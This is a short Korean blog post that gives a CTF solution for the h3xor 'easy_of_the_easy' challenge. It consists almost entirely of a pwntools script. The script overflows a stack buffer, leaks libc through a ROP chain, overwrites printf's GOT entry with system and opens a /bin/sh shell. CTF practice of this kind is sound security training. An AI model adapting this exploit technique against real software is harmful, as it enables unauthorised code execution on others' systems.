hOwDayS 선린 10720
h3xor ctf easy 본문
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 | from pwn import * p = process("./easy_of_the_easy") #p = remote("49.236.136.140",14000) e = ELF("./easy_of_the_easy") pr = 0x080483f9 pppr = 0x080489e9 bss = 0x0804a040 +100 for i in range(0,200): p.recv() p.sendline("1") p.sendline("1") p.sendline("0") p.sendline("3") p.sendline("18899") p.sendline("13") p.sendline("0") p.sendline("4") p.sendline("1") p.sendline("1") p.recvuntil("Good Luck!") payload = "A" * (0x12 + 4) payload += p32(e.plt["puts"]) payload += p32(pr) payload += p32(e.got["puts"]) payload += p32(e.plt["read"]) payload += p32(pppr) payload += p32(0) payload += p32(bss) payload += p32(len("/bin/sh\x00")) payload += p32(e.plt["read"]) payload += p32(pppr) payload += p32(0) payload += p32(e.got["printf"]) payload += p32(len("/bin/sh\x00")) payload += p32(e.plt["printf"]) payload += "AAAA" payload += p32(bss) raw_input() p.send(payload) #print hexdump(p.recv()) libc_base = u32(p.recv(4)) - 0x5fca0 log.success("Libc_base : "+hex(libc_base)) p.send("/bin/sh\x00") p.send(p32(libc_base + 0x3ada0)) p.interactive() | cs |
'CTF' 카테고리의 다른 글
yisf 2018 예선 writeup (0) | 2018.08.16 |
---|---|
h3xor ctf my_house (1) | 2018.06.17 |
선린인터넷고등학교 교내해킹방어대회 2018 vss (0) | 2018.06.11 |
선린인터넷고등학교 교내해킹방어대회 2018 cee (0) | 2018.06.11 |
선린인터넷고등학교 교내해킹방어대회 2018 SHELLCODING (0) | 2018.06.07 |
Comments